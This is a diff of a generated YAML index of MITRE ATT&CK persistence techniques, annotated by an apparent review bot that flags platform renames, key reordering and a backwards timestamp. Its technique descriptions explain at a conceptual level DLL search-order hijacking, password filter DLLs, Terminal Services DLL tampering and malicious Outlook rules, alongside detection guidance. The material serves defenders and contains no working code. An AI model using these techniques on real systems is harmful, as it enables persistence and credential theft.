- Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior. If winword.exe is the parent process for suspicious processes and activity relating to other adversarial techniques, then it could indicate that the application was used maliciously.
-
- Many Office-related persistence mechanisms require changes to the Registry and for binaries, files, or scripts to be written to disk or existing files modified to include malicious scripts. Collect events related to Registry key creation and modification for keys that could be used for Office-based persistence.(Citation: CrowdStrike Outlook Forms)(Citation: Outlook Today Home Page)
-
- Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
- x_mitre_version: '1.3'
+ url: https://github.com/sensepost/notruler
+ - source_name: Outlook Today Home Page
+ description: Soutcast. (2018, September 14). Outlook Today Homepage Persistence.
+ Retrieved February 5, 2019.
+ url: https://medium.com/@bwtech789/outlook-today-homepage-persistence-33ea9b505943
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- x_mitre_data_sources:
- - 'File: File Creation'
- - 'Application Log: Application Log Content'
- - 'Windows Registry: Windows Registry Key Modification'
- - 'File: File Modification'
- - 'Module: Module Load'
- - 'Process: Process Creation'
- - 'Windows Registry: Windows Registry Key Creation'
- - 'Command: Command Execution'
- x_mitre_permissions_required:
- - User
- - Administrator
- x_mitre_is_subtechnique: false
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1137
atomic_tests: []
T1098.003:
technique:
- modified: '2024-03-29T18:29:06.873Z'
+ modified: '2024-10-14T22:11:30.271Z'
name: 'Account Manipulation: Additional Cloud Roles'
description: "An adversary may add additional roles or permissions to an adversary-controlled
cloud account to maintain persistent access to a tenant. For example, adversaries
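Review bot: the platform list for T1137 changes from `Office 365` to `Office Suite` (with `x_mitre_version` `1.3` to `1.4`), and `x_mitre_permissions_required` (`User`, `Administrator`) is dropped; both change what downstream filters see. Anything that selects techniques by the platform string `Office 365` will stop returning T1137, so per-platform indexes derived from this file need regenerating in the same change. The external_references block is only reordered (`Microsoft Detect Outlook Forms` now second, `Outlook Today Home Page` last) with identical URLs and descriptions, so no citation content changed.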
@@ -28601,6 +28976,7 @@ persistence:
phase_name: persistence
- kill_chain_name: mitre-attack
phase_name: privilege-escalation
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_contributors:
- Microsoft Threat Intelligence Center (MSTIC)
- Alex Parsons, Crowdstrike
@@ -28611,6 +28987,7 @@ persistence:
- Praetorian
- Alex Soler, AttackIQ
- Arad Inbar, Fidelis Security
+ - Arun Seelagan, CISA
x_mitre_deprecated: false
x_mitre_detection: 'Collect activity logs from IAM services and cloud administrator
accounts to identify unusual activity in the assignment of roles to those
@@ -28619,13 +28996,13 @@ persistence:
x_mitre_domains:
- enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
x_mitre_platforms:
- - Office 365
- IaaS
- SaaS
- - Google Workspace
- - Azure AD
- x_mitre_version: '2.4'
+ - Office Suite
+ - Identity Provider
+ x_mitre_version: '2.5'
x_mitre_data_sources:
- 'User Account: User Account Modification'
type: attack-pattern
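Review bot: `x_mitre_platforms` for T1098.003 drops `Office 365`, `Google Workspace` and `Azure AD` in favour of `Office Suite` and `Identity Provider`, alongside the 2.4 to 2.5 version bump. Any per-platform index derived from `x_mitre_platforms` needs regenerating in the same change so the technique moves into the new platform buckets instead of silently disappearing from the old ones; worth calling out in the PR description, because a platform filter written against the old names will return nothing for this technique after merge.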
@@ -28667,9 +29044,6 @@ persistence:
url: https://rhinosecuritylabs.com/aws/aws-privilege-escalation-methods-mitigation/
object_marking_refs:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- x_mitre_attack_spec_version: 3.2.0
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1098.003
atomic_tests: []
T1547.012:
@@ -28737,19 +29111,18 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1547.012
atomic_tests: []
T1574.001:
technique:
- modified: '2024-04-18T22:54:54.668Z'
+ modified: '2024-09-30T17:32:59.948Z'
name: 'Hijack Execution Flow: DLL Search Order Hijacking'
description: |-
Adversaries may execute their own malicious payloads by hijacking the search order used to load DLLs. Windows systems use a common method to look for required DLLs to load into a program. (Citation: Microsoft Dynamic Link Library Search Order)(Citation: FireEye Hijacking July 2010) Hijacking DLL loads may be for the purpose of establishing persistence as well as elevating privileges and/or evading restrictions on file execution.
There are many ways an adversary can hijack DLL loads. Adversaries may plant trojan dynamic-link library files (DLLs) in a directory that will be searched before the location of a legitimate library that will be requested by a program, causing Windows to load their malicious library when it is called for by the victim program. Adversaries may also perform DLL preloading, also called binary planting attacks, (Citation: OWASP Binary Planting) by placing a malicious DLL with the same name as an ambiguously specified DLL in a location that Windows searches before the legitimate DLL. Often this location is the current working directory of the program.(Citation: FireEye fxsst June 2011) Remote DLL preloading attacks occur when a program sets its current directory to a remote location such as a Web share before loading a DLL. (Citation: Microsoft Security Advisory 2269637)
- Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
+ Phantom DLL hijacking is a specific type of DLL search order hijacking where adversaries target references to non-existent DLL files.(Citation: Hexacorn DLL Hijacking)(Citation: Adversaries Hijack DLLs) They may be able to load their own malicious DLL by planting it with the correct name in the location of the missing module.
Adversaries may also directly modify the search order via DLL redirection, which after being enabled (in the Registry and creation of a redirection file) may cause a program to load a different DLL.(Citation: Microsoft Dynamic-Link Library Redirection)(Citation: Microsoft Manifests)(Citation: FireEye DLL Search Order Hijacking)
@@ -28765,8 +29138,8 @@ persistence:
- Travis Smith, Tripwire
- Stefan Kanthak
- Marina Liang
- - Will Alexander
- - Ami Holeston
+ - Ami Holeston, CrowdStrike
+ - Will Alexander, CrowdStrike
x_mitre_deprecated: false
x_mitre_detection: Monitor file systems for moving, renaming, replacing, or
modifying DLLs. Changes in the set of DLLs that are loaded by a process (compared
@@ -28780,7 +29153,7 @@ persistence:
x_mitre_is_subtechnique: true
x_mitre_platforms:
- Windows
- x_mitre_version: '1.2'
+ x_mitre_version: '1.3'
x_mitre_data_sources:
- 'File: File Modification'
- 'Module: Module Load'
@@ -28806,6 +29179,10 @@ persistence:
description: Harbour, N. (2011, June 3). What the fxsst?. Retrieved November
17, 2020.
url: https://www.fireeye.com/blog/threat-research/2011/06/fxsst.html
+ - source_name: Hexacorn DLL Hijacking
+ description: Hexacorn. (2013, December 8). Beyond good ol’ Run key, Part 5.
+ Retrieved August 14, 2024.
+ url: https://www.hexacorn.com/blog/2013/12/08/beyond-good-ol-run-key-part-5/
- source_name: Microsoft Security Advisory 2269637
description: Microsoft. (, May 23). Microsoft Security Advisory 2269637. Retrieved
March 13, 2020.
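Review bot: the unchanged context line directly below the new entry, `description: Microsoft. (, May 23). Microsoft Security Advisory 2269637.`, has an empty year in the citation. It is not introduced by this patch and the index is regenerated from upstream ATT&CK data, so the fix belongs in the source bundle rather than here; noting it so it is not mistaken for a generator bug. The new entry itself is consistent: the `(Citation: Hexacorn DLL Hijacking)` added to the T1574.001 description now has a matching `source_name` in `external_references`.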
@@ -28833,42 +29210,11 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1574.001
atomic_tests: []
T1137.006:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
- type: attack-pattern
- created: '2019-11-07T19:52:52.801Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1137.006
- url: https://attack.mitre.org/techniques/T1137/006
- - url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
- description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
- source_name: Microsoft Office Add-ins
- - url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
- description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
- Persistence. Retrieved July 3, 2017.
- source_name: MRWLabs Office Persistence Add-ins
- - source_name: FireEye Mail CDS 2018
- url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
- description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
- Enterprise Email Compromise. Retrieved April 22, 2019.
- - source_name: GlobalDotName Jun 2019
- url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
- description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
- - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-10-15T15:37:09.190Z'
name: 'Office Application Startup: Add-ins'
description: "Adversaries may abuse Microsoft Office add-ins to obtain persistence
on a compromised system. Office add-ins can be used to add functionality to
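Review bot: nearly all of this hunk is key reordering rather than content change: `x_mitre_platforms`, `x_mitre_domains`, `object_marking_refs`, `id`, `type`, `created`, `created_by_ref` and the whole `external_references` list are deleted at the top of T1137.006 and re-emitted lower in the object, and each reference's keys are flipped from `url, description, source_name` to `source_name, description, url`. Suggest the generator emit keys in a fixed order (or preserve upstream order) so future regenerations only diff on real changes; as it stands the one genuine edit here, the `modified` timestamp, is buried under forty lines of churn.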
@@ -28883,13 +29229,18 @@ persistence:
kill_chain_phases:
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor and validate the Office trusted locations on the file system and audit the Registry entries relevant for enabling add-ins.(Citation: GlobalDotName Jun 2019)(Citation: MRWLabs Office Persistence Add-ins)
Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '1.1'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Modification'
@@ -28897,11 +29248,34 @@ persistence:
- 'Windows Registry: Windows Registry Key Creation'
- 'Process: Process Creation'
- 'File: File Creation'
- x_mitre_permissions_required:
- - Administrator
- - User
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--34f1d81d-fe88-4f97-bd3b-a3164536255d
+ created: '2019-11-07T19:52:52.801Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1137/006
+ external_id: T1137.006
+ - source_name: FireEye Mail CDS 2018
+ description: Caban, D. and Hirani, M. (2018, October 3). You’ve Got Mail!
+ Enterprise Email Compromise. Retrieved April 22, 2019.
+ url: https://summit.fireeye.com/content/dam/fireeye-www/summit/cds-2018/presentations/cds18-technical-s03-youve-got-mail.pdf
+ - source_name: MRWLabs Office Persistence Add-ins
+ description: Knowles, W. (2017, April 21). Add-In Opportunities for Office
+ Persistence. Retrieved July 3, 2017.
+ url: https://labs.mwrinfosecurity.com/blog/add-in-opportunities-for-office-persistence/
+ - source_name: Microsoft Office Add-ins
+ description: Microsoft. (n.d.). Add or remove add-ins. Retrieved July 3, 2017.
+ url: https://support.office.com/article/Add-or-remove-add-ins-0af570c4-5cf3-4fa9-9b88-403625a0b460
+ - source_name: GlobalDotName Jun 2019
+ description: Shukrun, S. (2019, June 2). Office Templates and GlobalDotName
+ - A Stealthy Office Persistence Technique. Retrieved August 26, 2019.
+ url: https://www.221bluestreet.com/post/office-templates-and-globaldotname-a-stealthy-office-persistence-technique
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1137.006
atomic_tests: []
T1505.002:
@@ -28932,7 +29306,7 @@ persistence:
url: https://www.welivesecurity.com/wp-content/uploads/2019/05/ESET-LightNeuron.pdf
description: 'Faou, M. (2019, May). Turla LightNeuron: One email away from
remote code execution. Retrieved June 24, 2019.'
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2021-10-18T17:05:44.321Z'
name: 'Server Software Component: Transport Agent'
description: "Adversaries may abuse Microsoft transport agents to establish
persistent access to systems. Microsoft Exchange transport agents can operate
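Review bot: the `modified` timestamp for T1505.002 moves backwards, from 2022-04-25 to 2021-10-18, while every other `modified` change in this patch moves forward. If that is what the upstream STIX bundle now reports it is fine, but consumers that compare `modified` to detect updated techniques will treat this entry as unchanged or as an older copy; worth confirming against the source bundle rather than assuming the generator picked the right object.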
@@ -28970,13 +29344,11 @@ persistence:
- SYSTEM
- Administrator
- root
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
identifier: T1505.002
atomic_tests: []
T1574.014:
technique:
- modified: '2024-04-18T15:03:32.158Z'
+ modified: '2024-04-28T15:44:25.342Z'
name: AppDomainManager
description: "Adversaries may execute their own malicious payloads by hijacking
how the .NET `AppDomainManager` loads assemblies. The .NET framework uses
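Review bot: T1505.002 ends up with no `x_mitre_attack_spec_version` at all: the `2.1.0` line is deleted here and, unlike T1547.012 or T1574.001 in this patch, no `3.2.0` replacement is added in any hunk touching this object (its only other change is the `modified` date rolling back in the previous hunk). Together with the retained list ending `- SYSTEM`, `- Administrator`, `- root` (presumably `x_mitre_permissions_required`, which the other objects drop), this looks like a stale copy of the object; suggest regenerating it from the same bundle as the other techniques, or at least keeping the old value rather than dropping the field.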
@@ -29002,7 +29374,7 @@ persistence:
phase_name: defense-evasion
x_mitre_contributors:
- Thomas B
- - Ivy Bostock
+ - Ivy Drexel
x_mitre_deprecated: false
x_mitre_detection: ''
x_mitre_domains:
@@ -29044,7 +29416,6 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1098.006:
technique:
@@ -29122,11 +29493,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1053:
technique:
- modified: '2024-03-01T15:29:46.832Z'
+ modified: '2024-10-15T15:14:03.453Z'
name: Scheduled Task/Job
description: |-
Adversaries may abuse task scheduling functionality to facilitate initial or recurring execution of malicious code. Utilities exist within all major operating systems to schedule programs or scripts to be executed at a specified date and time. A task can also be scheduled on a remote system, provided the proper authentication is met (ex: RPC and file and printer sharing in Windows environments). Scheduling a task on a remote system typically may require being a member of an admin or otherwise privileged group on the remote system.(Citation: TechNet Task Scheduler Security)
@@ -29206,35 +29576,10 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
atomic_tests: []
T1556.002:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- x_mitre_contributors:
- - Vincent Le Toux
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
- type: attack-pattern
- created: '2020-02-11T19:05:45.829Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- external_references:
- - source_name: mitre-attack
- external_id: T1556.002
- url: https://attack.mitre.org/techniques/T1556/002
- - url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
- description: Fuller, R. (2013, September 11). Stealing passwords every time
- they change. Retrieved November 21, 2017.
- source_name: Carnal Ownage Password Filters Sept 2013
- - url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
- description: Bialek, J. (2013, September 15). Intercepting Password Changes
- With Function Hooking. Retrieved November 21, 2017.
- source_name: Clymb3r Function Hook Passwords Sept 2013
- modified: '2022-04-25T14:00:00.188Z'
+ modified: '2024-08-21T16:16:18.271Z'
name: 'Modify Authentication Process: Password Filter DLL'
description: "Adversaries may register malicious password filter dynamic link
libraries (DLLs) into the authentication process to acquire user credentials
@@ -29258,71 +29603,60 @@ persistence:
phase_name: defense-evasion
- kill_chain_name: mitre-attack
phase_name: persistence
+ x_mitre_contributors:
+ - Vincent Le Toux
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for new, unfamiliar DLL files written to a domain controller and/or local computer. Monitor for changes to Registry entries for password filters (ex: HKEY_LOCAL_MACHINE\SYSTEM\CurrentControlSet\Control\Lsa\Notification Packages
) and correlate then investigate the DLL files these files reference.
Password filters will also show up as an autorun and loaded DLL in lsass.exe.(Citation: Clymb3r Function Hook Passwords Sept 2013)
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
- x_mitre_version: '2.0'
- x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '2.1'
x_mitre_data_sources:
- 'Windows Registry: Windows Registry Key Modification'
- 'File: File Creation'
- 'Module: Module Load'
- x_mitre_permissions_required:
- - Administrator
- - SYSTEM
- spec_version: '2.1'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--3731fbcd-0e43-47ae-ae6c-d15e510f0d42
+ created: '2020-02-11T19:05:45.829Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1556/002
+ external_id: T1556.002
+ - source_name: Clymb3r Function Hook Passwords Sept 2013
+ description: Bialek, J. (2013, September 15). Intercepting Password Changes
+ With Function Hooking. Retrieved November 21, 2017.
+ url: https://clymb3r.wordpress.com/2013/09/15/intercepting-password-changes-with-function-hooking/
+ - source_name: Carnal Ownage Password Filters Sept 2013
+ description: Fuller, R. (2013, September 11). Stealing passwords every time
+ they change. Retrieved November 21, 2017.
+ url: http://carnal0wnage.attackresearch.com/2013/09/stealing-passwords-every-time-they.html
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
+ x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
identifier: T1556.002
atomic_tests: []
T1505.005:
technique:
- x_mitre_platforms:
- - Windows
- x_mitre_domains:
- - enterprise-attack
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- type: attack-pattern
- id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
- created: '2022-03-28T15:34:44.590Z'
- x_mitre_version: '1.0'
- external_references:
- - source_name: mitre-attack
- external_id: T1505.005
- url: https://attack.mitre.org/techniques/T1505/005
- - source_name: James TermServ DLL
- url: https://twitter.com/james_inthe_box/status/1150495335812177920
- description: James. (2019, July 14). @James_inthe_box. Retrieved March 28,
- 2022.
- - source_name: Microsoft System Services Fundamentals
- url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
- description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
- Retrieved March 28, 2022.
- - source_name: Microsoft Remote Desktop Services
- url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
- description: Microsoft. (2019, August 23). About Remote Desktop Services.
- Retrieved March 28, 2022.
- - source_name: RDPWrap Github
- url: https://github.com/stascorp/rdpwrap
- description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
- Retrieved March 28, 2022.
- - source_name: Windows OS Hub RDP
- url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
- description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
- Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
- x_mitre_deprecated: false
- revoked: false
+ modified: '2024-09-12T19:40:42.810Z'
+ name: 'Server Software Component: Terminal Services DLL'
description: |-
Adversaries may abuse components of Terminal Services to enable persistent access to systems. Microsoft Terminal Services, renamed to Remote Desktop Services in some Windows Server OSs as of 2022, enable remote terminal connections to hosts. Terminal Services allows servers to transmit a full, interactive, graphical user interface to clients via RDP.(Citation: Microsoft Remote Desktop Services)
[Windows Service](https://attack.mitre.org/techniques/T1543/003)s that are run as a "generic" process (ex: svchost.exe
) load the service's DLL file, the location of which is stored in a Registry entry named ServiceDll
.(Citation: Microsoft System Services Fundamentals) The termsrv.dll
file, typically stored in `%SystemRoot%\System32\`, is the default ServiceDll
value for Terminal Services in `HKLM\System\CurrentControlSet\services\TermService\Parameters\`.
Adversaries may modify and/or replace the Terminal Services DLL to enable persistent access to victimized hosts.(Citation: James TermServ DLL) Modifications to this DLL could be done to execute arbitrary payloads (while also potentially preserving normal termsrv.dll
functionality) as well as to simply enable abusable features of Terminal Services. For example, an adversary may enable features such as concurrent [Remote Desktop Protocol](https://attack.mitre.org/techniques/T1021/001) sessions by either patching the termsrv.dll
file or modifying the ServiceDll
value to point to a DLL that provides increased RDP functionality.(Citation: Windows OS Hub RDP)(Citation: RDPWrap Github) On a non-server Windows OS this increased functionality may also enable an adversary to avoid Terminal Services prompts that warn/log out users of a system when a new RDP session is created.
- modified: '2022-05-11T14:00:00.188Z'
- created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- name: 'Server Software Component: Terminal Services DLL'
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
+ x_mitre_deprecated: false
x_mitre_detection: |-
Monitor for changes to Registry keys associated with ServiceDll
and other subkey values under HKLM\System\CurrentControlSet\services\TermService\Parameters\
.
@@ -29331,24 +29665,56 @@ persistence:
Monitor commands as well as processes and arguments for potential adversary actions to modify Registry values (ex: reg.exe
) or modify/replace the legitimate termsrv.dll
.
Monitor module loads by the Terminal Services process (ex: svchost.exe -k termsvcs
) for unexpected DLLs (the default is %SystemRoot%\System32\termsrv.dll
, though an adversary could also use [Match Legitimate Name or Location](https://attack.mitre.org/techniques/T1036/005) on a malicious payload).
- kill_chain_phases:
- - kill_chain_name: mitre-attack
- phase_name: persistence
+ x_mitre_domains:
+ - enterprise-attack
x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ x_mitre_version: '1.0'
x_mitre_data_sources:
- 'Module: Module Load'
- 'Command: Command Execution'
- 'File: File Modification'
- 'Windows Registry: Windows Registry Key Modification'
- 'Process: Process Creation'
- x_mitre_attack_spec_version: 2.1.0
+ type: attack-pattern
+ id: attack-pattern--379809f6-2fac-42c1-bd2e-e9dee70b27f8
+ created: '2022-03-28T15:34:44.590Z'
+ created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
+ external_references:
+ - source_name: mitre-attack
+ url: https://attack.mitre.org/techniques/T1505/005
+ external_id: T1505.005
+ - source_name: James TermServ DLL
+ description: James. (2019, July 14). @James_inthe_box. Retrieved September
+ 12, 2024.
+ url: https://x.com/james_inthe_box/status/1150495335812177920
+ - source_name: Microsoft System Services Fundamentals
+ description: Microsoft. (2018, February 17). Windows System Services Fundamentals.
+ Retrieved March 28, 2022.
+ url: https://social.technet.microsoft.com/wiki/contents/articles/12229.windows-system-services-fundamentals.aspx
+ - source_name: Microsoft Remote Desktop Services
+ description: Microsoft. (2019, August 23). About Remote Desktop Services.
+ Retrieved March 28, 2022.
+ url: https://docs.microsoft.com/windows/win32/termserv/about-terminal-services
+ - source_name: RDPWrap Github
+ description: Stas'M Corp. (2014, October 22). RDP Wrapper Library by Stas'M.
+ Retrieved March 28, 2022.
+ url: https://github.com/stascorp/rdpwrap
+ - source_name: Windows OS Hub RDP
+ description: Windows OS Hub. (2021, November 10). How to Allow Multiple RDP
+ Sessions in Windows 10 and 11?. Retrieved March 28, 2022.
+ url: http://woshub.com/how-to-allow-multiple-rdp-sessions-in-windows-10/
+ object_marking_refs:
+ - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
+ x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1505.005
atomic_tests: []
T1176:
technique:
- modified: '2024-04-18T23:22:37.874Z'
+ modified: '2024-09-12T19:48:15.871Z'
name: Browser Extensions
description: "Adversaries may abuse Internet browser extensions to establish
persistent access to victim systems. Browser extensions or plugins are small
@@ -29440,8 +29806,8 @@ persistence:
url: https://static.googleusercontent.com/media/research.google.com/en//pubs/archive/43824.pdf
- source_name: Chrome Extension C2 Malware
description: 'Kjaer, M. (2016, July 18). Malware in the browser: how you might
- get hacked by a Chrome extension. Retrieved November 22, 2017.'
- url: https://kjaer.io/extension-malware/
+ get hacked by a Chrome extension. Retrieved September 12, 2024.'
+ url: https://web.archive.org/web/20240608001937/https://kjaer.io/extension-malware/
- source_name: Catch All Chrome Extension
description: Marinho, R. (n.d.). "Catch-All" Google Chrome Malicious Extension
Steals All Posted Data. Retrieved November 16, 2017.
@@ -29472,71 +29838,139 @@ persistence:
- marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
x_mitre_attack_spec_version: 3.2.0
x_mitre_modified_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
- spec_version: '2.1'
identifier: T1176
atomic_tests: []
T1137.005:
technique:
- x_mitre_platforms:
- - Windows
- - Office 365
- x_mitre_domains:
- - enterprise-attack
+ modified: '2024-10-15T16:02:26.206Z'
+ name: Outlook Rules
+ description: |-
+ Adversaries may abuse Microsoft Outlook rules to obtain persistence on a compromised system. Outlook rules allow a user to define automated behavior to manage email messages. A benign rule might, for example, automatically move an email to a particular folder in Outlook if it contains specific words from a specific sender. Malicious Outlook rules can be created that can trigger code execution when an adversary sends a specifically crafted email to that user.(Citation: SilentBreak Outlook Rules)
+
+ Once malicious rules have been added to the user’s mailbox, they will be loaded when Outlook is started. Malicious rules will execute when an adversary sends a specifically crafted email to the user.(Citation: SilentBreak Outlook Rules)
+ kill_chain_phases:
+ - kill_chain_name: mitre-attack
+ phase_name: persistence
x_mitre_contributors:
- Microsoft Security
- object_marking_refs:
- - marking-definition--fa42a846-8d90-4e51-bc29-71d5b4802168
- id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
+ x_mitre_deprecated: false
+ x_mitre_detection: |-
+ Microsoft has released a PowerShell script to safely gather mail forwarding rules and custom forms in your mail environment as well as steps to interpret the output.(Citation: Microsoft Detect Outlook Forms) This PowerShell script is ineffective in gathering rules with modified `PRPR_RULE_MSG_NAME` and `PR_RULE_MSG_PROVIDER` properties caused by adversaries using a Microsoft Exchange Server Messaging API Editor (MAPI Editor), so only examination with the Exchange Administration tool MFCMapi can reveal these mail forwarding rules.(Citation: Pfammatter - Hidden Inbox Rules) SensePost, whose tool [Ruler](https://attack.mitre.org/software/S0358) can be used to carry out malicious rules, forms, and Home Page attacks, has released a tool to detect Ruler usage.(Citation: SensePost NotRuler)
+
+ Collect process execution information including process IDs (PID) and parent process IDs (PPID) and look for abnormal chains of activity resulting from Office processes. Non-standard process execution trees may also indicate suspicious or malicious behavior.
+ x_mitre_domains:
+ - enterprise-attack
+ x_mitre_is_subtechnique: true
+ x_mitre_platforms:
+ - Windows
+ - Office Suite
+ x_mitre_version: '1.2'
+ x_mitre_data_sources:
+ - 'Process: Process Creation'
+ - 'Application Log: Application Log Content'
+ - 'Command: Command Execution'
type: attack-pattern
+ id: attack-pattern--3d1b9d7e-3921-4d25-845a-7d9f15c0da44
created: '2019-11-07T20:00:25.560Z'
created_by_ref: identity--c78cb6e5-0c4b-4611-8297-d1b8b55e40b5
+ revoked: false
external_references:
- source_name: mitre-attack
- external_id: T1137.005
url: https://attack.mitre.org/techniques/T1137/005
- - source_name: SilentBreak Outlook Rules
- url: https://silentbreaksecurity.com/malicious-outlook-rules/
- description: Landers, N. (2015, December 4). Malicious Outlook Rules. Retrieved
- February 4, 2019.
+ external_id: T1137.005
+ - source_name: Pfammatter - Hidden Inbox Rules
+ description: Damian Pfammatter. (2018, September 17). Hidden Inbox Rules in
+ Microsoft Exchange. Retrieved October 12, 2021.
+ url: https://blog.compass-security.com/2018/09/hidden-inbox-rules-in-microsoft-exchange/
